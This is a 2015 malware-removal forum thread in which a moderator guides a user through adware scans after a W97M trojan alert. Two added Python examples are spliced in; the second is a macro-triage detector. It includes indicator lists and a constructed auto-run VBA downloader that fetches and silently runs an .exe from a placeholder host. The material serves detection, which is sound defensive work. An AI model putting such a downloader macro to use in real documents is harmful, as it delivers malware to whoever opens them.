
W97m malicious macro - Reassurance needed


8 replies to this topic

#1 Milly147

  • Members
  • 5 posts

Posted 18 August 2015 - 04:17 AM

Hi all,

 

I've done something stupid. Whilst clearing out my email spam folder, I noticed an email from an uncle who has not emailed me for years. It had his correct email address and, although I knew it was in the spam folder for a reason, I thought it was important, so I moved it to my inbox, opened it and clicked on the link. I instantly realised what an idiot I was.

 

My antivirus is F-Secure, so I ran a full scan. F-Secure quarantined a W97M trojan, removed it and restarted the computer. Another scan showed all was good. I use this computer to do my internet banking and am still not convinced, so I installed the Malwarebytes free trial and ran that scan. Malwarebytes found 'non-malware' but picked up a huge amount of PUP stuff, so I quarantined all of it and removed all of the items.

 

My question to you all is: Have I done enough to remove this virus and can I confidently use this laptop to do my personal stuff like internet banking?

 

Thank you.

 




 


#2 buddy215

  • Moderator
  • 13,198 posts

Posted 18 August 2015 - 05:37 AM

If MBAM found a lot of junk then there is likely much more to be found and removed. Use the programs below to find and remove adware and malware.

 

The safest way to do online banking is using a Linux live CD...DVD...or flash drive. If you are interested in finding out more about that post in the Linux Forum.

 

Use CCleaner to remove temporary files, program caches, cookies, logs, etc. Use the default settings. No need to use the Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.

After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.

CCleaner - PC Optimization and Cleaning - Free Download

 

  • download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message

Download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#3 Milly147
  • Topic Starter

  • Members
  • 5 posts

Posted 19 August 2015 - 11:14 AM

Hi Buddy215,

 

Thanks for your help. I was able to run the above scans apart from ESET, which opened, but there was nowhere to click to download the scanner.

 

Here are the logs for JRT and ADW cleaner.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes

Version: 7.5.6 (08.10.2015:1)

OS: Windows 10 Home x64

Ran by Ours on 19/08/2015 at 15:54:05.01

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

 

~~~ Services

 

 

~~~ Tasks

Successfully deleted: [Task] C:\WINDOWS\system32\tasks\EgisUpdate

 

 

~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{B242FC32-2B60-48EA-A8E3-2E280EDBC48F}

 

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{B242FC32-2B60-48EA-A8E3-2E280EDBC48F}

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Clients\StartMenuInternet\Torch

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

 

 

~~~ Files

Successfully deleted: [File] C:\Users\Ours\Appdata\Local\google\chrome\user data\default\local storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage

Successfully deleted: [File] C:\Users\Ours\Appdata\Local\google\chrome\user data\default\local storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage-journal

 

 

~~~ Folders

Successfully deleted: [Folder] C:\Program Files (x86)\movies toolbar

 

 

~~~ Chrome

Successfully deleted: [Folder] C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:

gkojfkhlekighikafcpjkiklfbnlmeio

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:

[

gkojfkhlekighikafcpjkiklfbnlmeio

]

 

And here is the ADW Cleaner Log.

 

 

# AdwCleaner v5.002 - Logfile created 19/08/2015 at 16:30:48

# Updated 18/08/2015 by Xplode

# Database : 2015-08-18.2 [Server]

# Operating system : Windows 10 Home (x64)

# Username : Ours - ACER1

# Running from : C:\Users\Ours\Desktop\AdwCleaner.exe

# Option : Cleaning

***** [ Services ] *****

 

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\Movies App

***** [ Files ] *****

 

***** [ Shortcuts ] *****

 

***** [ Scheduled tasks ] *****

 

***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\Applications\Torch.exe

[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{6A4BCABA-C437-4C76-A54E-AF31B8A76CB9}

[-] Key Deleted : HKCU\Software\torch

[-] Key Deleted : HKLM\SOFTWARE\torch

[!] Key Not Deleted : [x64] HKCU\Software\torch

***** [ Web browsers ] *****

[-] [C:\Users\Ours\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : uk.ask.com

*************************

:: Proxy settings cleared

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1029 bytes] ##########

 

 

Hoping that all of the above looks ok? I don't know what most of it is though!

 

Thanks
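An added example, not part of the thread and not code from JRT or AdwCleaner: a Python script that reads log lines in the two formats posted above and turns them into a checklist of persistence points to re-verify, grouping them by where an analyst would look (scheduled tasks, IE BHO/toolbar registrations, Chrome extensions, browser search settings, plain registry keys, files on disk) and surfacing anything a tool reported it could not remove. The sample logs are trimmed copies of the logs in this post; the class names and helper functions are this example's own.

```python
"""Turn JRT / AdwCleaner log lines into a checklist of persistence points to re-verify.
Added example, not part of the thread or of either tool. The sample logs are trimmed
copies of the logs posted in the thread; artifact classes and helper names are mine."""
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Artifact:
    tool: str        # which tool reported it
    kind: str        # Task, Registry Key, Folder, Search Provider, ...
    location: str    # path, registry key or extension id
    removed: bool    # False when the tool said it could NOT delete the item

JRT_RE = re.compile(r"^Successfully deleted: \[(?P<kind>[^\]]+)\] (?P<loc>.+)$")  # "[Task] C:\..."
JRT_PREF_RE = re.compile(r"^\[(?P<file>[^\]]+)\] - (?P<what>.+)$")  # "[...\Preferences] - Extensions Deleted:"
# "[-] Key Deleted : HKLM\...", "[!] Key Not Deleted : [x64] HKCU\...", "[-] [file] [Search Provider] Deleted : x"
ADW_RE = re.compile(r"^\[[-!]\] (?P<head>.+?) (?P<status>Not Deleted|Deleted) : (?P<loc>.+)$")
GUID_RE = re.compile(r"\{[0-9A-F-]{36}\}", re.I)
CHROME_ID_RE = re.compile(r"^[a-p]{32}$")  # Chrome extension ids: 32 chars of a-p

def parse_log(text: str) -> list[Artifact]:
    """Parse either tool's log; lines that are not findings are ignored."""
    found: list[Artifact] = []
    in_ext_block = False  # inside a JRT "Extensions Deleted:" list (ids, maybe wrapped in [ ])
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if in_ext_block and (CHROME_ID_RE.match(line) or line in ("[", "]")):
            if line not in ("[", "]"):
                found.append(Artifact("JRT", "Chrome Extension", line, True))
            continue
        in_ext_block = False
        if m := JRT_RE.match(line):
            found.append(Artifact("JRT", m["kind"], m["loc"], True))
        elif m := JRT_PREF_RE.match(line):
            if m["what"].endswith(":"):
                in_ext_block = True
            else:
                found.append(Artifact("JRT", "Browser Setting", f"{m['file']}: {m['what']}", True))
        elif m := ADW_RE.match(line):
            tags = re.findall(r"\[([^\]]+)\]", m["head"])  # present in the "[file] [Search Provider]" form
            kind = tags[-1] if tags else m["head"]
            loc = re.sub(r"^\[x(?:64|86)\] ", "", m["loc"])  # drop the "[x64] " registry-view tag
            if tags:
                loc = f"{tags[0]}: {loc}"
            found.append(Artifact("AdwCleaner", kind, loc, m["status"] == "Deleted"))
    return found

def persistence_class(a: Artifact) -> str:
    loc = a.location.lower()
    if a.kind == "Task":
        return "scheduled task"
    if "browser helper objects" in loc or "internet explorer\\toolbar" in loc:
        return "IE extension (BHO/toolbar)"
    if a.kind == "Chrome Extension" or "chrome-extension_" in loc or "\\extensions\\" in loc:
        return "Chrome extension"
    if a.kind in ("Search Provider", "Browser Setting"):
        return "browser search/preferences"
    if a.kind.startswith("Registry") or a.kind in ("Key", "Value"):
        return "registry"
    return "files on disk"

def checklist(artifacts: list[Artifact]) -> dict[str, list[Artifact]]:
    """Group by class; a bare CLSID key joins the BHO/toolbar that shares its GUID."""
    ie_guids = {g.upper() for a in artifacts if persistence_class(a).startswith("IE")
                for g in GUID_RE.findall(a.location)}
    grouped: dict[str, list[Artifact]] = {}
    for a in artifacts:
        cls = persistence_class(a)
        if cls == "registry" and any(g.upper() in ie_guids for g in GUID_RE.findall(a.location)):
            cls = "IE extension (BHO/toolbar)"
        grouped.setdefault(cls, []).append(a)
    return grouped

def leftovers(artifacts: list[Artifact]) -> list[Artifact]:
    """Findings a tool could not remove: verify by hand before trusting the machine."""
    return [a for a in artifacts if not a.removed]

SAMPLE_JRT = r"""
Successfully deleted: [Task] C:\WINDOWS\system32\tasks\EgisUpdate
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{B242FC32-2B60-48EA-A8E3-2E280EDBC48F}
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}
Successfully deleted: [File] C:\Users\Ours\Appdata\Local\google\chrome\user data\default\local storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage
[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[
gkojfkhlekighikafcpjkiklfbnlmeio
]
"""
SAMPLE_ADW = r"""
[-] Folder Deleted : C:\Program Files (x86)\Movies App
[-] Key Deleted : HKLM\SOFTWARE\Classes\Applications\Torch.exe
[-] Key Deleted : HKCU\Software\torch
[!] Key Not Deleted : [x64] HKCU\Software\torch
[-] [C:\Users\Ours\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : uk.ask.com
"""
```

The line worth acting on in these logs is `[!] Key Not Deleted : [x64] HKCU\Software\torch`: a key the cleaner could not remove is exactly what to check by hand (regedit, or a second AdwCleaner pass) before trusting the machine for banking, and `leftovers()` makes it impossible to miss among the dozens of `[-]` lines. The GUID link is the other small analytical step: `HKEY_CLASSES_ROOT\CLSID\{690EF1CF-...}` means nothing on its own, but it is the COM registration for the Browser Helper Object deleted a few lines later, so `checklist()` lists it with the IE extensions rather than as an anonymous registry key.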



#4 buddy215

  • Moderator
  • 13,198 posts

Posted 19 August 2015 - 11:28 AM

Very important to run Eset Online Scanner...try again. Here is another link for the scanner.....Run ESET Online Scanner

 

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.


#5 Milly147
  • Topic Starter

  • Members
  • 5 posts

Posted 19 August 2015 - 04:06 PM

Hi buddy215,

 

I've managed to download ESET and here is the report:

 

 

C:\Windows.old\Users\Ours\AppData\Local\Temp\DTX\Reporting\ReportingHelper.dll  a variant of Win32/Bundled.Toolbar.Ask.K potentially unsafe application cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\CHAppConfirm.exe  a variant of Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.X potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\Uninstall.exe     a variant of Win32/TorchMedia potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nslD6C5.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nslD6C5.tmp\Starter.exe     Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsnFD40.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.X potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsq7BE4.tmp\MoviesAppHelper.dll    a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsq7BE4.tmp\Starter.exe a variant of Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsqFCD.tmp\Helper.dll   a variant of Win32/Toolbar.SearchSuite.P potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nswD16C.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nswD16C.tmp\Starter.exe     Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\MoviesAppHelper.DLL a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\222917c8\patch_ff.exe    a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\480c22cc\SetupDataMngr_TTB.exe multiple threats     cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\6633692f\SetupDataMngr_TTB.exe a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\d6686411\SetupDataMngr_TTB.exe a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\dd010ecd\patch_ff.exe    a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined.

 

Is it best to now uninstall ESET, JRT and AdwCleaner?

 

Thanks again for your help

 



#6 buddy215

  • Moderator
  • 13,198 posts

Posted 19 August 2015 - 04:58 PM

I would like to see what MBAM found and removed. You can access the logs and post them...

I'm thinking that Eset only found what MBAM removed. I would like to confirm that as Eset's results say Windows.old...haven't seen that before.



#7 buddy215

  • Moderator
  • 13,198 posts

Posted 19 August 2015 - 05:24 PM

I think I figured it out....you upgraded to Windows 10...don't know why I missed that....Eset actually scanned your previous OS files....imagine that.

 

If you are not having a problem with ads, search redirects, etc. then I think you are good to go.

 

You can keep those programs...they do update when needed....or remove...up to you


Edited by buddy215, 19 August 2015 - 05:28 PM.


#8 Milly147
  • Topic Starter

  • Members
  • 5 posts

Posted 20 August 2015 - 03:17 AM

Thank you buddy215, for all the help and for taking the time to sift through all that stuff!

 

Feeling much happier now and definitely reassured. :)



#9 buddy215

  • Moderator
  • 13,198 posts

Posted 20 August 2015 - 06:35 AM

You're welcome....the malware linked to in your email is used to download all types of other adware and malware. Fortunate that your antivirus caught it...that doesn't always happen, as the security programs are ALWAYS playing catch-up to identify malware that is being created by the thousands every week.

Happy surfin'


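The last reply describes the W97M detection as a downloader. As an added illustration (editor's example, not the sample from this thread, which the page does not reproduce, and not any of the tools named above), here is a small static triage script in Python that looks for the three traits such a macro needs: an auto-exec entry point, download and execute primitives, and the light string obfuscation that hides them from plain string matching. The macro it scans is constructed for this example, with a placeholder `.invalid` host; the indicator lists and function names are the example's own.

```python
"""Static triage of a Word/Excel VBA macro: does it auto-run, and can it download
and execute something? Added example, not part of the thread. The macro below is
constructed for illustration (placeholder .invalid host) and is not the sample the
thread discusses, which the page does not reproduce; indicator lists are mine."""
from __future__ import annotations
import re

# Procedures Office runs on its own once macros are enabled.
AUTO_EXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose",
             "Document_Close", "Workbook_Open", "Auto_Open")
# What a downloader needs: fetch bytes, write them, run them, somewhere to stage them.
INDICATORS = {
    "download": ("URLDownloadToFile", r"WinHttp\.WinHttpRequest", r"MSXML2\.XMLHTTP",
                 r"Microsoft\.XMLHTTP", "InternetOpenUrl"),
    "write": (r"ADODB\.Stream", r"\bOpen\b.*\bFor Binary\b", "SaveToFile",
              r"Scripting\.FileSystemObject"),
    "execute": (r"\bShell\b", r"WScript\.Shell", "ShellExecute", "CreateProcess", "Win32_Process"),
    "stage": (r'Environ\("TEMP"\)', r'Environ\("APPDATA"\)'),
}
CHR_RE = re.compile(r"Chr\((\d+)\)")
STRREV_RE = re.compile(r'StrReverse\("([^"]*)"\)')
JOIN_RE = re.compile(r'"([^"]*)"\s*&\s*(?:_\s*)?"([^"]*)"')  # "ab" & "cd" -> "abcd", also across "& _" line breaks
URL_RE = re.compile(r"""https?://[^\s"']+""", re.I)

def deobfuscate(src: str) -> str:
    """Fold the cheapest VBA string tricks so literals become searchable: Chr(n),
    StrReverse("...") and concatenation of adjacent literals. Chr(34) (a double
    quote) is left alone because folding it would break the quoting."""
    out = CHR_RE.sub(lambda m: m.group(0) if int(m.group(1)) == 34 else '"' + chr(int(m.group(1))) + '"', src)
    out = STRREV_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', out)
    while True:
        joined = JOIN_RE.sub(r'"\1\2"', out)
        if joined == out:
            return out
        out = joined

def triage(src: str) -> dict:
    """Auto-exec entry points, indicator hits by category, URLs, and whether the
    download -> execute chain sits behind an entry point."""
    text = deobfuscate(src)
    entry = [p for p in AUTO_EXEC if re.search(rf"\bSub\s+{p}\b", text, re.I)]
    hits = {cat: [p for p in pats if re.search(p, text, re.I)] for cat, pats in INDICATORS.items()}
    hits = {cat: found for cat, found in hits.items() if found}
    urls = sorted(set(URL_RE.findall(text)))
    chain = bool(entry) and "download" in hits and "execute" in hits
    return {"auto_exec": entry, "indicators": hits, "urls": urls, "downloader_chain": chain}

def verdict(report: dict) -> str:
    if report["downloader_chain"]:
        return "likely downloader"
    if report["auto_exec"] and report["indicators"]:
        return "suspicious: auto-exec with system access"
    return "no auto-exec downloader pattern"

# Constructed sample: the classic shape (declare urlmon, fetch to %TEMP%, run), with
# the cheap obfuscation real samples use to dodge plain string matching.
SAMPLE_MACRO = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim u As String, f As String
    u = "http://example.invalid/upd" & Chr(97) & Chr(116) & Chr(101) & ".exe"
    f = Environ("TEMP") & "\" & StrReverse("exe.tadpu")
    If URLDownloadToFile(0, u, f, 0, 0) = 0 Then
        Shell f, vbHide
    End If
End Sub
'''
BENIGN_MACRO = '''
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        rep = triage(src)
        print(name, "->", verdict(rep), rep)
```

This is a first-look heuristic, not a verdict: a legitimate macro may call `Shell`, and a real sample can hide behind tricks the script does not fold (`Replace`, `Mid`, strings kept in document properties or form controls). For anything beyond triage, a dedicated tool such as olevba from oletools is the right next step; what this shows is the pattern that makes "macro reached by a link in a spam e-mail" worth the full scan sequence in this thread rather than a quick reassurance.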



